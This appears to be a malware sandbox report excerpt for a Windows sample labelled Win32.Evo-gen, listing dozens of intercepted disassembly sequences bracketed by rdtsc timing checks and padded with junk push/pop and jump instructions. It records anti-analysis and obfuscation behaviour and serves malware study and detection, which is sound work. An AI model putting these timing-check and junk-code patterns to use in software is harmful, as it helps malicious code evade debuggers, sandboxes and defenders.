                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B517E second address: 10B519B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F449CEB0741h 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10B519B second address: 10B51AA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CC63D76h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10BDB52 second address: 10BDB69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10BDB69 second address: 10BDB6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10BDB6D second address: 10BDB79 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F449CEB0736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C63C8 second address: 10C63D6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F449CC63D76h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C63D6 second address: 10C63DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C903C second address: 10C9056 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D82h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10C9056 second address: 10C905A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CB76E second address: 10CB773 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CB773 second address: 10CB779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CE98C second address: 10CE9AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jmp 00007F449CC63D88h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10CE9AB second address: 10CE9B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D5B45 second address: 10D5B5B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jno 00007F449CC63D76h 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F449CC63D76h 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D5B5B second address: 10D5B5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D45B9 second address: 10D45BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D45BD second address: 10D45C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D45C3 second address: 10D45C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4868 second address: 10D487E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F449CEB073Ah 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D487E second address: 10D4882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4882 second address: 10D48A7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007F449CEB0748h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4A05 second address: 10D4A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jnp 00007F449CC63D76h 0x0000000b jmp 00007F449CC63D7Dh 0x00000010 jmp 00007F449CC63D88h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4A37 second address: 10D4A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4A41 second address: 10D4A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4BAB second address: 10D4BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007F449CEB0746h 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4BC6 second address: 10D4BE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F449CC63D76h 0x00000009 jmp 00007F449CC63D7Fh 0x0000000e jp 00007F449CC63D76h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D4D27 second address: 10D4D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A4E second address: 10D8A7D instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CC63D7Eh 0x00000008 jmp 00007F449CC63D7Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jnl 00007F449CC63D78h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A7D second address: 10D8A87 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A87 second address: 10D8A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8A8C second address: 10D8A92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8638 second address: 10D863E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D863E second address: 10D8643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D8643 second address: 10D8664 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D81h 0x00000009 jns 00007F449CC63D76h 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D87BD second address: 10D87C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F449CEB0736h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10D87C7 second address: 10D87CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10E67A5 second address: 10E67AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10E67AB second address: 10E67C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D89h 0x00000009 popad 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10E67C9 second address: 10E67D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E72 second address: 10F7E7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E7E second address: 10F7E83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E83 second address: 10F7E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 10F7E89 second address: 10F7E96 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111556F second address: 1115575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1115575 second address: 1115579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1115579 second address: 1115587 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F449CC63D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1115587 second address: 11155A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB0745h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 11143B0 second address: 11143B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 11143B4 second address: 11143E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jno 00007F449CEB074Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F449CEB0736h 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 111457B second address: 1114587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 js 00007F449CC63D76h 0x0000000b pop ecx 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1114701 second address: 1114709 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 1114709 second address: 1114713 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F449CC63D76h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F00BA second address: 55F00F4 instructions: 0x00000000 rdtsc 0x00000002 mov al, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F449CEB0744h 0x0000000b jmp 00007F449CEB0742h 0x00000010 pop ecx 0x00000011 popad 0x00000012 xchg eax, ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 mov ecx, 1794080Fh 0x0000001d popad 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F00F4 second address: 55F0108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F449CC63D80h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0108 second address: 55F0166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F449CEB0744h 0x00000013 adc al, 00000018h 0x00000016 jmp 00007F449CEB073Bh 0x0000001b popfd 0x0000001c pushad 0x0000001d mov ebx, esi 0x0000001f pushad 0x00000020 popad 0x00000021 popad 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F449CEB0741h 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b push ecx 0x0000002c movsx ebx, ax 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 mov ebx, 7B454466h 0x00000037 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0166 second address: 55F01D6 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CC63D87h 0x00000008 add ecx, 5E8BEEEEh 0x0000000e jmp 00007F449CC63D89h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a jmp 00007F449CC63D7Eh 0x0000001f xchg eax, esi 0x00000020 jmp 00007F449CC63D80h 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F449CC63D7Eh 0x0000002d rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F01D6 second address: 55F022D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov edx, esi 0x0000000d pushfd 0x0000000e jmp 00007F449CEB0740h 0x00000013 add ecx, 2C69DB28h 0x00000019 jmp 00007F449CEB073Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov esi, dword ptr [ebp+08h] 0x00000023 jmp 00007F449CEB0746h 0x00000028 xchg eax, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F022D second address: 55F024A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F024A second address: 55F02C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F449CEB0747h 0x00000009 xor si, 0F2Eh 0x0000000e jmp 00007F449CEB0749h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a jmp 00007F449CEB0747h 0x0000001f xchg eax, edi 0x00000020 pushad 0x00000021 push eax 0x00000022 push edx 0x00000023 pushfd 0x00000024 jmp 00007F449CEB0742h 0x00000029 adc ax, B708h 0x0000002e jmp 00007F449CEB073Bh 0x00000033 popfd 0x00000034 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F02C9 second address: 55F02D4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx esi, dx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F02D4 second address: 55F0340 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F449CEB0747h 0x00000008 adc eax, 3BA37FFEh 0x0000000e jmp 00007F449CEB0749h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 test esi, esi 0x00000019 jmp 00007F449CEB073Eh 0x0000001e je 00007F450E7EEA2Ah 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F449CEB0747h 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0340 second address: 55F0346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F0346 second address: 55F034A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F034A second address: 55F034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F034E second address: 55F03F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F449CEB0747h 0x00000014 je 00007F450E7EE9EDh 0x0000001a jmp 00007F449CEB0746h 0x0000001f mov edx, dword ptr [esi+44h] 0x00000022 jmp 00007F449CEB0740h 0x00000027 or edx, dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b call 00007F449CEB073Eh 0x00000030 pushad 0x00000031 popad 0x00000032 pop esi 0x00000033 push eax 0x00000034 push edx 0x00000035 pushfd 0x00000036 jmp 00007F449CEB0747h 0x0000003b xor eax, 4C70E78Eh 0x00000041 jmp 00007F449CEB0749h 0x00000046 popfd 0x00000047 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F03F2 second address: 55F043B instructions: 0x00000000 rdtsc 0x00000002 mov eax, 1C5A6297h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a test edx, 61000000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F449CC63D7Fh 0x00000019 add ecx, 0768C59Eh 0x0000001f jmp 00007F449CC63D89h 0x00000024 popfd 0x00000025 mov ecx, 0EF6ED67h 0x0000002a popad 0x0000002b rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55F043B second address: 55F046D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB073Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F450E7EE972h 0x0000000f jmp 00007F449CEB073Eh 0x00000014 test byte ptr [esi+48h], 00000001h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov esi, 54A83C3Fh 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E08DB second address: 55E093A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F449CC63D7Ah 0x00000012 xor cl, 00000038h 0x00000015 jmp 00007F449CC63D7Bh 0x0000001a popfd 0x0000001b movzx eax, dx 0x0000001e popad 0x0000001f push ebx 0x00000020 mov ebx, esi 0x00000022 pop ecx 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 pushad 0x00000027 pushad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b mov dx, si 0x0000002e popad 0x0000002f and esp, FFFFFFF8h 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 call 00007F449CC63D7Fh 0x0000003a pop eax 0x0000003b pushad 0x0000003c popad 0x0000003d popad 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E093A second address: 55E0969 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F449CEB0742h 0x00000008 pop esi 0x00000009 call 00007F449CEB073Bh 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop esi 0x00000018 mov ax, bx 0x0000001b popad 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0969 second address: 55E096F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E096F second address: 55E0973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0973 second address: 55E0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E0977 second address: 55E09F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b pushad 0x0000000c call 00007F449CEB073Ah 0x00000011 push eax 0x00000012 pop edi 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007F449CEB0747h 0x0000001a or ax, 737Eh 0x0000001f jmp 00007F449CEB0749h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, esi 0x00000027 pushad 0x00000028 mov dx, cx 0x0000002b push eax 0x0000002c mov esi, edx 0x0000002e pop edi 0x0000002f popad 0x00000030 push eax 0x00000031 jmp 00007F449CEB0741h 0x00000036 xchg eax, esi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F449CEB073Dh 0x0000003e rdtsc
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exeRDTSC instruction interceptor: First address: 55E09F4 second address: 55E09FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
